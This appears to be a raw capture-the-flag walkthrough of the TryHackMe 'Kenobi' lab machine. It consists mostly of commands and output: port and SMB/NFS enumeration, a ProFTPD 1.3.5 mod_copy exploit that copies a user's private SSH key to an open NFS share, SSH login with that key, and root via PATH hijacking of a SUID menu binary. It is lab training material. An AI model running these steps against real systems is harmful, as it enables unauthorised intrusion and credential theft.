RECON 
 
nmap -sV 10.10.252.52
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

ENUM
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.252.52
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.252.52\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.252.52\anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.252.52\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

smbclient //10.10.252.52/anonymous
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> type log.txt
type: command not found
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (221.3 KiloBytes/sec) (average 221.3 KiloBytes/sec)
smb: \> exit


cat log.txt 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa): 
Created directory '/home/kenobi/.ssh'.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:C17GWSl/v7KlUZrOwWxSyk+F7gYhVzsbfqkCIkr2d7Q kenobi@kenobi
The key's randomart image is:
+---[RSA 2048]----+
|                 |
|           ..    |
|        . o. .   |
|       ..=o +.   |
|      . So.o++o. |
|  o ...+oo.Bo*o  |
| o o ..o.o+.@oo  |
|  . . . E .O+= . |
|     . .   oBo.  |
+----[SHA256]-----+

# This is a basic ProFTPD configuration file (rename it to 
# 'proftpd.conf' for actual use.  It establishes a single server
# and a single anonymous login.  It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.

ServerName			"ProFTPD Default Installation"
ServerType			standalone
DefaultServer			on

# Port 21 is the standard FTP port.
Port				21

ENUM NFS MOUNT
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.252.52
Nmap scan report for 10.10.252.52
Host is up (0.013s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-ls: Volume /var
|   access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION  UID  GID  SIZE  TIME                 FILENAME
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  .
| rwxr-xr-x   0    0    4096  2019-09-04T12:27:33  ..
| rwxr-xr-x   0    0    4096  2019-09-04T12:09:49  backups
| rwxr-xr-x   0    0    4096  2019-09-04T10:37:44  cache
| rwxrwxrwt   0    0    4096  2019-09-04T08:43:56  crash
| rwxrwsr-x   0    50   4096  2016-04-12T20:14:23  local
| rwxrwxrwx   0    0    9     2019-09-04T08:41:33  lock
| rwxrwxr-x   0    108  4096  2019-09-04T10:37:44  log
| rwxr-xr-x   0    0    4096  2019-01-29T23:27:41  snap
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  www
|_
| nfs-showmount: 
|_  /var *
| nfs-statfs: 
|   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
|_  /var        9204224.0  1836520.0  6877108.0  22%   16.0T        32000

ENUM FTP
nc 10.10.252.52 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.252.52]
^C
root@kali:~# searchsploit proftpd 1.3.5
----------------------------------------------------- ----------------------------------------
 Exploit Title                                       |  Path
                                                     | (/usr/share/exploitdb/)
----------------------------------------------------- ----------------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasp | exploits/linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution  | exploits/linux/remote/36803.py
ProFTPd 1.3.5 - File Copy                            | exploits/linux/remote/36742.txt
----------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~# cd tryhackme/kenobi/

TRANSFER SSH ID_RSA KEY FILE

root@kali:~/tryhackme/kenobi# nc 10.10.252.52 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.252.52]
SITE CPFR /home/kenobi/.ssh/id_rsa    
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
^C
root@kali:/var/tmp# mkdir /mnt/kenobiNFS/
mkdir: cannot create directory ‘/mnt/kenobiNFS/’: File exists
root@kali:/var/tmp# ls -l /mnt/kenobiNFS/
total 48
drwxr-xr-x  2 root root   4096 Sep  4  2019 backups
drwxr-xr-x  9 root root   4096 Sep  4  2019 cache
drwxrwxrwt  2 root root   4096 Sep  4  2019 crash
drwxr-xr-x 40 root root   4096 Sep  4  2019 lib
drwxrwsr-x  2 root staff  4096 Apr 12  2016 local
lrwxrwxrwx  1 root root      9 Sep  4  2019 lock -> /run/lock
drwxrwxr-x 10 root netdev 4096 Sep  4  2019 log
drwxrwsr-x  2 root mail   4096 Feb 26  2019 mail
drwxr-xr-x  2 root root   4096 Feb 26  2019 opt
lrwxrwxrwx  1 root root      4 Sep  4  2019 run -> /run
drwxr-xr-x  2 root root   4096 Jan 29  2019 snap
drwxr-xr-x  5 root root   4096 Sep  4  2019 spool
drwxrwxrwt  6 root root   4096 Oct 17 20:41 tmp
drwxr-xr-x  3 root root   4096 Sep  4  2019 www
root@kali:/var/tmp# ls -la /mnt/kenobiNFS
total 56
drwxr-xr-x 14 root root   4096 Sep  4  2019 .
drwxr-xr-x  3 root root   4096 Jun  5 17:02 ..
drwxr-xr-x  2 root root   4096 Sep  4  2019 backups
drwxr-xr-x  9 root root   4096 Sep  4  2019 cache
drwxrwxrwt  2 root root   4096 Sep  4  2019 crash
drwxr-xr-x 40 root root   4096 Sep  4  2019 lib
drwxrwsr-x  2 root staff  4096 Apr 12  2016 local
lrwxrwxrwx  1 root root      9 Sep  4  2019 lock -> /run/lock
drwxrwxr-x 10 root netdev 4096 Sep  4  2019 log
drwxrwsr-x  2 root mail   4096 Feb 26  2019 mail
drwxr-xr-x  2 root root   4096 Feb 26  2019 opt
lrwxrwxrwx  1 root root      4 Sep  4  2019 run -> /run
drwxr-xr-x  2 root root   4096 Jan 29  2019 snap
drwxr-xr-x  5 root root   4096 Sep  4  2019 spool
drwxrwxrwt  6 root root   4096 Oct 17 20:41 tmp
drwxr-xr-x  3 root root   4096 Sep  4  2019 www
root@kali:/var/tmp# cp /mnt/kenobiNFS/tmp/id_rsa .
root@kali:/var/tmp# ls -la
total 40
drwxrwxrwt  9 root root 4096 Oct 17 20:42 .
drwxr-xr-x 13 root root 4096 Aug 21  2018 ..
-rw-r--r--  1 root root 1675 Oct 17 20:42 id_rsa
drwx------  3 root root 4096 Oct 17 16:16 systemd-private-83c07c0caa97434e8d7d91559628d7f9-bolt.service-DfXSY4
drwx------  3 root root 4096 Oct 17 16:16 systemd-private-83c07c0caa97434e8d7d91559628d7f9-colord.service-Nr0vxI
drwx------  3 root root 4096 Oct 17 16:16 systemd-private-83c07c0caa97434e8d7d91559628d7f9-haveged.service-7VbHjM
drwx------  3 root root 4096 Oct 17 16:16 systemd-private-83c07c0caa97434e8d7d91559628d7f9-ModemManager.service-h1ZXy5
drwx------  3 root root 4096 Oct 17 16:16 systemd-private-83c07c0caa97434e8d7d91559628d7f9-rtkit-daemon.service-jCIm7e
drwx------  3 root root 4096 Oct 17 16:16 systemd-private-83c07c0caa97434e8d7d91559628d7f9-systemd-timesyncd.service-Xa85hn
drwx------  3 root root 4096 Oct 17 16:16 systemd-private-83c07c0caa97434e8d7d91559628d7f9-upower.service-5ubKho

LOGIN VIA KENOBI SSH KEY

root@kali:/var/tmp# chmod 600 id_rsa 
root@kali:/var/tmp# ssh -i id_rsa kenobi@10.10.252.52
The authenticity of host '10.10.252.52 (10.10.252.52)' can't be established.
ECDSA key fingerprint is SHA256:uUzATQRA9mwUNjGY6h0B/wjpaZXJasCPBY30BvtMsPI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.252.52' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

103 packages can be updated.
65 updates are security updates.


Last login: Wed Sep  4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

kenobi@kenobi:~$ cat /home/kenobi/
.bash_history  .bashrc        .profile       .ssh/          .viminfo       
.bash_logout   .cache/        share/         user.txt       
kenobi@kenobi:~$ cat /home/kenobi/user.txt 


PRIV ESC
enobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
kenobi@kenobi:~$ curl -I localhost
HTTP/1.1 200 OK
Date: Sun, 18 Oct 2020 00:45:56 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html

kenobi@kenobi:~$ uname -r
4.8.0-58-generic
kenobi@kenobi:~$ ifconfig
eth0      Link encap:Ethernet  HWaddr 02:76:47:d5:0d:db  
          inet addr:10.10.252.52  Bcast:10.10.255.255  Mask:255.255.0.0
          inet6 addr: fe80::76:47ff:fed5:ddb/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:9001  Metric:1
          RX packets:490 errors:0 dropped:0 overruns:0 frame:0
          TX packets:581 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:58019 (58.0 KB)  TX bytes:96982 (96.9 KB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:178 errors:0 dropped:0 overruns:0 frame:0
          TX packets:178 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:13381 (13.3 KB)  TX bytes:13381 (13.3 KB)

kenobi@kenobi:~$ strings /usr/bin/menu
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
__isoc99_scanf
puts
__stack_chk_fail
printf
system
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
UH-`
AWAVA
AUATL
[]A\A]A^A_
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
 Invalid choice
;*3$"
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.11) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7594
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
menu.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
__stack_chk_fail@@GLIBC_2.4
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__isoc99_scanf@@GLIBC_2.7
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment

kenobi@kenobi:~$ cd /tmp
kenobi@kenobi:/tmp$ echo /bin/sh > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# cat /root/root.txt

